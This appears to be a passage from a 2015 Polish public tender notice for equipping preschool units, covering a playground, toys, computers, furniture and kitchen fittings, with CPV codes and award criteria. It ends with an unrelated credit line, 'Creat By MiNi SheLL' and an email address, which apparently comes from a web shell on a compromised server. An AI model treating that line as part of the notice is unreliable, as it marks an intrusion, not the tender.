- zestaw zabawowy maxi - w skład zestawu zabawowego wchodzi: zjeżdżalnia metalowa, stopy stalowe, ocynkowane, wieża kwadratowa z daszkiem x4, zjeżdżalnia x2, koci grzbiet, wejście linowe, drabinka wejściowa, tunel linowy, most linowy, kładka linowa ścianka linowa, ścianka wspinaczkowa.
- montaż urządzeń zabawowych posiadanych przez Zamawiającego: karuzela, sprężynowiec, kółko i krzyżyk;
- wykonanie strefy bezpiecznej z nawierzchni piaskowej o powierzchni 147,00 m2 z bezpiecznym obrzeżem.
W ramach budowy placów zabaw należy dokonać rozplantowania wybranego humusu na przyległym terenie i obsiać trawą. 
Elementy placów zabaw, konstrukcję nawierzchni bezpiecznej wykonać należy według opracowanych projektów budowlanych, norm i przepisów bhp.
UWAGI: 
Materiały z rozbiórki nadającej się do ponownego wykorzystania Wykonawca przygotuje (zdemontuje, posegreguje) i przewiezie w miejsce wskazane przez Zamawiającego. Pozostałe materiały z rozbiórki nienadające się do ponownego wbudowania, nadmiar gruntu, gruz Wykonawca zagospodaruje we własnym zakresie;
W przypadku, gdy w dokumentacji projektowej opisano materiały lub urządzenia za pomocą podania nazwy ich producenta, patentów technicznych lub pochodzenia, to w odniesieniu do tych materiałów lub urządzeń Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych równoważnych materiałów lub urządzeń pod warunkiem posiadania przez nie parametrów nie gorszych niż materiały lub urządzenia, które one zastępują. Jeżeli zajdzie powyższa sytuacja Zamawiający wymaga od Wykonawcy złożenia stosownych dokumentów, które potwierdzą zastosowanie równoważnych materiałów lub urządzeń. 
Wycena oferty winna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu zamówienia zgodnie z obowiązującym prawem i normami.
Prace budowlane należy wykonać w oparciu o:
1. Projekty budowlane.
2. STWiORB.
3. Przedmiary robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji na przedmiot zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZAKUP I DOSTAWA ARTYKUŁÓW  PLASTYCZNYCH, ZABAWEK  
I POMOCY DYDAKTYCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup wraz z dostawą artykułów  plastycznych, pomocy  dydaktycznych  i  zabawek  dla dzieci  w  oddziałach przedszkolnych przy szkołach podstawowych wskazanych w  Rozdziale 1 pkt. 1.
Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są we wzorze załącznika nr 6.2. do oferty (Rozdział 15 SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.52.00.00-9, 37.80.00.00-6, 44.81.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZAKUP, DOSTAWA  I MONTAŻ SPRZĘTU KOMPUTEROWEGO, MULTIMEDIALNEGO I AUDIOWIZUALNEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia obejmuje  zakup, dostawę i montaż (ewentualnie uruchomienie) następującego  sprzętu komputerowego i multimedialnego:  tablice interaktywne dotykowe, projektory krótkoogniskowe z zestawem montażowym, projektory krótkoogniskowe ze statywami mobilnymi, przenośne nagłośnienia CD, telewizory 42 cali z uchwytami, głośniki do tablic interaktywnych, odtwarzacze DVD, Laptopy z systemami operacyjnymi, myszy bezprzewodowe, odtwarzacze CD- MP3, kserokopiarki, komplety głośników, urządzenia wielofunkcyjne, aparaty cyfrowe do oddziałów przedszkolnych przy szkołach podstawowych wskazanych w  Rozdziale 1 pkt. 1.
Szczegółowy wykaz, wymagane minimalne parametry oraz ilości sprzętu komputerowego i multimedialnego opisane są we wzorze załącznika nr 6.3. do oferty (Rozdział 15 SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.21.31.00-6, 32.00.00.00-3, 32.32.00.00-2, 32.32.46.00-6, 38.65.16.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZAKUP, DOSTAWA I MONTAŻ MEBLI  DO  SAL  I  SZATNI, WYPOSAŻENIA WYPOCZYNKOWEGO I WYPOSAŻENIA  ZAPEWNIAJĄCEGO BEZPIECZNE  WARUNKI OPIEKI NAD DZIEĆMI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup, dostawę i montaż mebli i elementów wyposażenia, m.in.:  stoły, krzesła przedszkolne, fotele obrotowe, regałów, zestawów szafek i półek , biurek, tablic suchościeralno - magnetycznych, parawanów tematycznych, rolet okiennych, , siedzisk, kanap, szatni dla dzieci, szaf metalowych, gaśnic proszkowych, apteczek z kompletnym wyposażeniem, instrukcja udzielania pierwszej pomocy do oddziałów przedszkolnych przy szkołach podstawowych wskazanych w  Rozdziale 1 pkt. 1.
Szczegółowy wykaz, rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są we wzorze załącznika nr 6.4. do oferty (Rozdział 15 SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.47.00.00-5, 35.11.13.20-4, 39.16.00.00-1, 39.16.10.00-8, 44.11.53.10-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZAKUP, DOSTAWA I MONTAŻ WYPOSAŻENIA DO TOALET I  DO  KUCHNI ORAZ ZAPEWNIAJĄCEGO UTRZYMANIE CZYSTOŚCI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup, dostawę i montaż następujących elementów wyposażenia i sprzętu m.in.: umywalki z osprzętem, miski ustępowe ze spłuczką, pisuary, lustra, podajniki na mydło, podajniki na ręczniki, podajniki na papier toaletowy, podesty do toalet i umywalek, półeczki na kubki, kosze, talerze, sztućce, stoliki kuchenne, szafki wiszące, elementy wyposażenia kuchni ze stali nierdzewnej, baterie, zlewozmywaki, blaty stołowe, garnki, termosy stalowe,  odkurzacze bezworkowe uniwersalne, pralki, czajniki elektryczne, kuchnie elektryczne, kuchenki mikrofalowe, blendery lodówko - zamrażarki, zmywarki, miksery do oddziałów przedszkolnych przy szkołach podstawowych wskazanych w  Rozdziale 1 pkt. 1.
Szczegółowy wykaz, rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami zawarte są we wzorze załącznika nr 6.5. do oferty (Rozdział 15 SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.62.20.00-1, 39.71.14.00-3, 39.14.40.00-3, 39.51.44.00-2, 44.41.00.00-7, 44.41.13.00-7, 44.41.17.40-3, 39.71.11.30-9, 39.71.32.10-8, 39.71.34.30-6, 42.95.90.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com